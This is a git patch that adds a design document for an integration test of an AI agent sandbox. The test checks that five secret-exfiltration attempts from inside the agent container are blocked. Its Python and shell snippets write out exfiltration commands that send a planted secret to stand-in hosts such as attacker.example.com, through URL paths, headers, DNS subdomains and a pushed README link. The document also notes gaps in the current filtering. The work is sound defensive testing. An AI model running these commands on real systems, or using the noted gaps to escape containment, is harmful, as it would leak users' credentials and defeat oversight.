From 62f6716e8d26bc9b18846086320737a66a2f3a47 Mon Sep 17 00:00:00 2001
From: didericis <eric@dideric.is>
Date: Tue, 26 May 2026 21:52:24 -0400
Subject: [PATCH] docs(prd-0022): end-to-end sandbox-escape integration test
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Draft a PRD for a composite integration test that brings up
a real bottle with a known allowlist + planted secret and
runs five attacks from inside the agent container:

  1. Request to non-allowlisted hostname
  2. Request to non-allowlisted IP (incl. host-header spoof)
  3. Secret exfil via HTTP — path / query / body / headers
  4. Secret exfil via crafted DNS subdomain
  5. Secret exfil via README link pushed through git-gate

Each attack passes only when blocked with a permissions
error. The suite is backend-agnostic — runs against
whatever CLAUDE_BOTTLE_BACKEND selects — so it becomes the
gate the upcoming smolmachines spike has to pass before that
backend can substitute for Docker.

Sized into 5 chunks (fixture → attacks 1+2 → attack 3 →
attack 4 → attack 5). Seven open questions called out,
biggest being: today's pipelock probably leaks via header /
path / query because DLP only scans bodies — the test will
expose this as a real gap (chunk 3 lands with
`expectedFailure` markers if so).
---
 .../0022-sandbox-escape-integration-test.md   | 415 ++++++++++++++++++
 1 file changed, 415 insertions(+)
 create mode 100644 docs/prds/0022-sandbox-escape-integration-test.md

diff --git a/docs/prds/0022-sandbox-escape-integration-test.md b/docs/prds/0022-sandbox-escape-integration-test.md
new file mode 100644
index 0000000..2d26c23
--- /dev/null
+++ b/docs/prds/0022-sandbox-escape-integration-test.md
@@ -0,0 +1,415 @@
+# PRD 0022: End-to-end sandbox-escape integration test
+
+- **Status:** Draft
+- **Author:** didericis
+- **Created:** 2026-05-26
+
+## Summary
+
+A new integration test, `tests/integration/test_sandbox_escape.py`,
+that brings up a real bottle with a known allowlist + a known
+in-bottle secret, then runs five attacks from inside the agent
+container and asserts each one fails. The five categories are
+the live cross-section of how the sandbox is supposed to be
+load-bearing:
+
+  1. Request to a non-allowlisted hostname
+  2. Request to a non-allowlisted IP literal
+  3. Secret exfiltration to an allowed dest via HTTP (URL path,
+     query string, request body, request headers)
+  4. Secret exfiltration to an allowed dest via crafted DNS
+     (subdomain-encoded host)
+  5. Secret exfiltration via a link inside a README pushed
+     through git-gate
+
+The suite is the backend-agnostic gate the smolmachines work
+has to pass before that backend can be considered a viable
+substitute for Docker. Today's Docker backend is the
+backend-under-test; the suite runs against whatever
+`CLAUDE_BOTTLE_BACKEND` resolves to.
+
+## Problem
+
+The sandbox today is a composition of layers (pipelock,
+egress, git-gate, `--internal` network, supervise) each tested
+in isolation but never as a whole. The supervise integration
+test exercises the MCP plumbing; `test_orphan_cleanup` covers
+the cleanup CLI; the per-sidecar integration tests bring up
+one sidecar at a time. None of them ask the operator-relevant
+question: **can an in-bottle agent get a secret out?**
+
+That's the question every prospective backend has to answer
+before it can ship. Smolmachines (or any other VM-based
+backend) will reimplement the sidecar topology over a
+different runtime. Without a backend-agnostic test we'd be
+reading the layers' code by eye to confirm each new backend
+glues them correctly. The diff between "looks right" and
+"actually blocks exfil" is the whole point of the project.
+
+## Goals / Success Criteria
+
+The test suite passes when **every one of the five attacks
+fails** with a clear permissions-error signal:
+
+1. **Hostname not in allowlist.** Agent's `curl
+   https://evil.example.com/` returns non-200 (proxy
+   rejection, connection error, or 403). The test asserts the
+   exit code is non-zero AND the response body / stderr does
+   not contain the upstream's actual response.
+
+2. **IP literal not in allowlist.** Agent's `curl
+   https://198.51.100.1/` (RFC 5737 documentation range) is
+   blocked. Additionally tests `curl --resolve
+   api.anthropic.com:443:198.51.100.1 https://api.anthropic.com/`
+   to confirm the host header trick doesn't bypass DNS
+   resolution.
+
+3. **Secret in HTTP request to an allowed destination.** A
+   known SECRET env var is planted in the bottle. The agent
+   tries four shapes against the allowlisted destination:
+   - Secret in URL path: `GET /v1/<SECRET>`
+   - Secret in query string: `GET /v1/?leak=<SECRET>`
+   - Secret in request body: `POST /v1/messages` with JSON
+     containing the secret
+   - Secret in request headers: `GET /v1/` with
+     `X-Custom: <SECRET>`
+   The test asserts pipelock's DLP body scanner rejects (3)
+   and surfaces what (1)/(2)/(4) actually do — they may
+   currently pass through (see open questions).
+
+4. **Secret-bearing DNS subdomain to allowed dest's parent.**
+   Agent runs `curl https://<SECRET>.api.anthropic.com/`. The
+   hostname is constructed to look "under" an allowlisted
+   apex but the SECRET payload leaks via the DNS query to
+   whichever resolver pipelock/egress consults. The test
+   asserts pipelock rejects the host BEFORE issuing the DNS
+   query (host-allowlist matches the exact apex, not
+   subdomains).
+
+5. **Secret-bearing link in a PR README.** Agent edits
+   `README.md` to include
+   `[click](https://attacker.example.com/?leak=<SECRET>)`,
+   commits, and `git push`es through git-gate. The pre-receive
+   hook's gitleaks scan must reject the push because the
+   secret matches one of gitleaks's bundled rules.
+
+The "pass" condition is uniform across all five: the attack's
+exit code is non-zero AND the secret never reaches a network
+destination outside the bottle.
+
+## Non-goals
+
+- **Detecting exfiltration via side channels** — timing,
+  cache state, error-message-length oracles. v1 covers the
+  direct paths only.
+- **Asserting on specific error messages or HTTP status
+  codes.** Each layer (pipelock / egress / git-gate /
+  gitleaks) has its own rejection vocabulary. The test
+  asserts on the OUTCOME (attack failed, no upstream traffic)
+  not the WORDING.
+- **Testing the Docker backend's specific sandbox
+  implementation in detail.** That's what the per-sidecar
+  integration tests already do. This suite is composite: did
+  the whole bottle prevent leakage, regardless of which layer
+  caught it?
+- **A network-tap that confirms zero packets reached
+  attacker.example.com.** Out of scope for v1; we trust the
+  pipelock/egress error reporting and verify exit codes. If
+  we want zero-packets confirmation later, a host-side
+  iptables / pcap layer can extend the suite.
+- **Running against a backend that doesn't exist yet.** The
+  suite is written against the abstract `BottleBackend` API
+  via the existing `get_bottle_backend()` selector; future
+  smolmachines work flips
+  `CLAUDE_BOTTLE_BACKEND=smolmachines` and reruns. No
+  smolmachines-specific code here.
+
+## Scope
+
+### In scope
+
+- A new `tests/integration/test_sandbox_escape.py` with one
+  TestSandboxEscape class and one `test_<n>_<category>`
+  method per attack.
+- A test fixture that:
+  - Builds a manifest with one bottle, one agent
+  - The bottle declares: a few allowlisted egress routes
+    (api.anthropic.com, etc.), a git-gate upstream pointing
+    at a throwaway repo, supervise off (not under test)
+  - Plants a known `TEST_SECRET` value in the bottle's env.
+    The value matches a gitleaks rule (e.g., shaped like an
+    Anthropic API key) so the README test fires the right
+    pre-receive rejection.
+- A `_run_in_agent(script)` helper that wraps
+  `bottle.exec(script)` and returns an `ExecResult`.
+- Assertions per category that read the existing
+  `ExecResult.returncode` / `.stdout` / `.stderr`.
+
+### Out of scope
+
+- The per-attack remediation engines. If a category's
+  assertion fails, the test is reporting a real gap — the
+  remediation is its own PRD.
+- Running the suite as part of every PR's CI. v1 lives in
+  `tests/integration/` and runs locally on demand; CI
+  integration is a follow-up that has to weigh wall-clock
+  cost (bringup is ~10s per test class).
+
+## Proposed design
+
+### Single fixture per attack class
+
+`setUpClass` brings the bottle up once; `tearDownClass`
+brings it down. Per-test setup is cheap (resetting any
+secret-content-storage). The five attacks share the same
+bottle so the suite is ~15s wall-clock total instead of
+~50s with per-test bringup.
+
+### Bottle manifest
+
+```yaml
+# tests/integration/fixtures/sandbox-escape/agents/sandbox-tester.md
+---
+bottle: dev
+---
+
+(no prompt — exec_claude isn't called)
+```
+
+```yaml
+# tests/integration/fixtures/sandbox-escape/bottles/dev.md
+---
+env:
+  - name: TEST_SECRET
+    value: sk-ant-api03-fake-shape-but-realistic-length-for-gitleaks
+
+egress:
+  routes:
+    - host: api.anthropic.com
+
+git:
+  - Name: throwaway
+    Upstream: ssh://git@127.0.0.1:22/throwaway.git
+    IdentityFile: ~/.ssh/cb-test-key  # fixture key
+---
+```
+
+`TEST_SECRET` is shaped like an Anthropic API key so
+gitleaks's `anthropic-api-key` rule fires on the README. We
+don't ship a real key; the prefix-pattern + length match the
+rule's regex.
+
+The git upstream URL is unreachable on purpose — we want
+git-gate's pre-receive hook to reject the push BEFORE it
+tries to forward to a real upstream. The hook's gitleaks
+scan happens first.
+
+### Per-attack scaffolding
+
+Each test calls `bottle.exec(script)` (the existing
+`Bottle.exec` from `claude_bottle.backend.Bottle`) and
+asserts on the returncode + stdout + stderr.
+
+The agent container has `curl`, `git`, `dig`, etc. pre-
+installed (already true today for the Docker bottle image).
+
+### Attack-1: hostname not in allowlist
+
+```python
+def test_1_hostname_not_in_allowlist(self):
+    result = self.bottle.exec(
+        'curl --silent --max-time 5 --fail '
+        'https://evil.example.com/ ; echo "exit=$?"'
+    )
+    self.assertNotEqual(0, result.returncode)
+    # The attack's stdout should not contain anything from
+    # evil.example.com — pipelock should have stopped it.
+    self.assertNotIn("evil.example.com", result.stdout)
+    self.assertIn("exit=", result.stdout)
+    # extract the curl exit, assert non-zero
+    ...
+```
+
+### Attack-2: IP literal not in allowlist
+
+```python
+def test_2_ip_not_in_allowlist(self):
+    # Direct IP
+    result = self.bottle.exec(
+        'curl --silent --max-time 5 --fail https://198.51.100.1/'
+    )
+    self.assertNotEqual(0, result.returncode)
+    # Host-header spoof
+    result = self.bottle.exec(
+        'curl --silent --max-time 5 --fail '
+        '--resolve api.anthropic.com:443:198.51.100.1 '
+        'https://api.anthropic.com/'
+    )
+    self.assertNotEqual(0, result.returncode)
+```
+
+### Attack-3: HTTP exfil shapes
+
+Loop over four shapes (path / query / body / header),
+assert each one is blocked by either pipelock's DLP or
+egress's path-filter. Headers in particular may not be DLP-
+scanned today — surface that gap clearly if so.
+
+```python
+SHAPES = [
+    ("path",   'curl -sf "https://api.anthropic.com/v1/$TEST_SECRET"'),
+    ("query",  'curl -sf "https://api.anthropic.com/v1/?leak=$TEST_SECRET"'),
+    ("body",   'curl -sf -X POST "https://api.anthropic.com/v1/messages" '
+               '-H "Content-Type: application/json" '
+               '-d "{\\"secret\\": \\"$TEST_SECRET\\"}"'),
+    ("header", 'curl -sf "https://api.anthropic.com/v1/" '
+               '-H "X-Custom: $TEST_SECRET"'),
+]
+
+def test_3_http_exfil_blocked(self):
+    for name, cmd in SHAPES:
+        with self.subTest(shape=name):
+            result = self.bottle.exec(cmd)
+            self.assertNotEqual(
+                0, result.returncode,
+                f"{name} exfil should have been blocked",
+            )
+```
+
+### Attack-4: DNS exfil via crafted subdomain
+
+```python
+def test_4_dns_exfil_blocked(self):
+    result = self.bottle.exec(
+        'curl --silent --max-time 5 --fail '
+        '"https://$TEST_SECRET.api.anthropic.com/"'
+    )
+    self.assertNotEqual(0, result.returncode)
+```
+
+Asserts the host wasn't in pipelock's exact-match allowlist
+(api.anthropic.com matches `api.anthropic.com`, not
+`<secret>.api.anthropic.com`).
+
+### Attack-5: secret in README push
+
+```python
+def test_5_readme_push_blocked(self):
+    result = self.bottle.exec(
+        'cd /tmp && git init test-repo && cd test-repo && '
+        'git config user.email "test@example.com" && '
+        'git config user.name "test" && '
+        'echo "[click](https://attacker.example.com/?leak=$TEST_SECRET)" > README.md && '
+        'git add . && git commit -m "leak" && '
+        'git remote add origin '
+        'git://claude-bottle-git-gate-<slug>/throwaway.git && '
+        'git push origin master'
+    )
+    self.assertNotEqual(0, result.returncode)
+    self.assertIn("gitleaks", (result.stderr + result.stdout).lower())
+```
+
+The `<slug>` is templated via the bottle's known identity at
+fixture-time. Asserts gitleaks fired (looking for the
+literal "gitleaks" in stderr).
+
+## Implementation chunks
+
+Sized small.
+
+1. **Fixture manifest + secret env-var plumbing.** Just the
+   files under `tests/integration/fixtures/sandbox-escape/`
+   and the test class scaffolding with `setUpClass` /
+   `tearDownClass` bringing up + tearing down the bottle.
+   No attack tests yet.
+2. **Attack 1 + 2 (hostname + IP).** The simplest two —
+   curl returns non-zero, that's the assertion.
+3. **Attack 3 (HTTP exfil shapes).** Parameterized over the
+   four shapes via subTest. Likely surfaces gaps in current
+   DLP coverage for header / path / query shapes.
+4. **Attack 4 (DNS exfil).** Exact-match-allowlist
+   verification.
+5. **Attack 5 (README push via git-gate).** Hardest because
+   it requires the git-gate sidecar configured and the
+   gitleaks rule fired. The "throwaway" upstream URL is
+   intentionally unreachable to keep the test fully
+   self-contained.
+
+## Open questions
+
+1. **What does today's pipelock actually do for shapes 3.1,
+   3.2, 3.4?** DLP body-scanning is a known feature; URL /
+   path / header scanning is less clear. The test will tell
+   us — if a shape passes today (attack succeeds), it's a
+   real gap and the test fails LOUDLY rather than silently
+   passing. Either:
+   - Treat the test as authoritative: every shape MUST block
+     for the suite to pass. Failing shapes are real bugs.
+   - Treat the test as descriptive: mark the failing shapes
+     `expectedFailure` and resolve them in a follow-up PRD.
+
+   Lean toward the first — the project's purpose is sandbox
+   integrity; documenting "we knowingly leak headers" is
+   worse than fixing it. But for v1 of this test it's OK to
+   land with `expectedFailure` markers + tickets.
+
+2. **DNS exfil via the agent's direct DNS resolver.** Today
+   the agent's `--internal` network has no default gateway,
+   so direct DNS queries to 8.8.8.8 fail. The crafted-
+   hostname attack rides on pipelock's resolution, which is
+   what test 4 covers. Should we ALSO test that direct DNS
+   (e.g., `dig @8.8.8.8 secret.example.com`) is blocked?
+   Probably yes — adds one assertion to test 4 and confirms
+   the network isolation is intact.
+
+3. **Realistic fake secret.** `sk-ant-api03-...` shape is
+   what gitleaks's anthropic-api-key rule matches. Verify
+   the exact regex before settling on the fixture value;
+   wrong-shape secret would mean attack 5 silently passes
+   the wrong way (gitleaks doesn't fire, README ships).
+
+4. **Reachability of throwaway git upstream.** Pointing at
+   `ssh://git@127.0.0.1:22/throwaway.git` means git-gate
+   would try (and fail) to push to upstream after gitleaks
+   passes. We want gitleaks to REJECT before any upstream
+   attempt — so the push always fails at gitleaks, never
+   later. Confirm this ordering in git-gate's pre-receive
+   sequence.
+
+5. **CI vs. local-only.** The integration test takes ~15s
+   (compose-up + 5 attacks + teardown). Running it on every
+   PR pays for itself the first time it catches a sandbox
+   regression but slows the green-tick feedback for unrelated
+   PRs. v1 ships as a local-only test; CI integration is a
+   follow-up that decides whether to gate merges on it.
+
+6. **Backend-agnostic invocation.** The suite reads
+   `CLAUDE_BOTTLE_BACKEND` so it runs against whatever
+   backend is active. For the smolmachines spike, the
+   developer sets that env var + runs the same test file.
+   No code change needed in the suite itself. Worth
+   verifying the existing `get_bottle_backend()` machinery
+   handles the backend-not-yet-implemented case gracefully
+   (it dies with a clear message today — confirm that's
+   what we want).
+
+7. **Test environment requirements.** The agent container
+   needs `curl`, `git`, `dig`. Already in today's Docker
+   image; need to declare these as required for any
+   future backend's base image too. Worth noting in the
+   smolmachines PRD.
+
+## References
+
+- PRD 0017 — egress-proxy + path-allowlist + auth injection
+  (the layer test 3 + 4 stresses)
+- PRD 0014 / 0015 — pipelock / egress remediation flows (the
+  surfaces the attacks would propose changes to if denied
+  via the supervise route)
+- PRD 0008 — git-gate + pre-receive gitleaks (the layer
+  test 5 stresses)
+- PRD 0018 — compose-per-instance (the topology the test
+  brings up)
+- `tests/integration/test_supervise_sidecar.py` — the
+  existing single-sidecar integration test pattern this
+  suite generalizes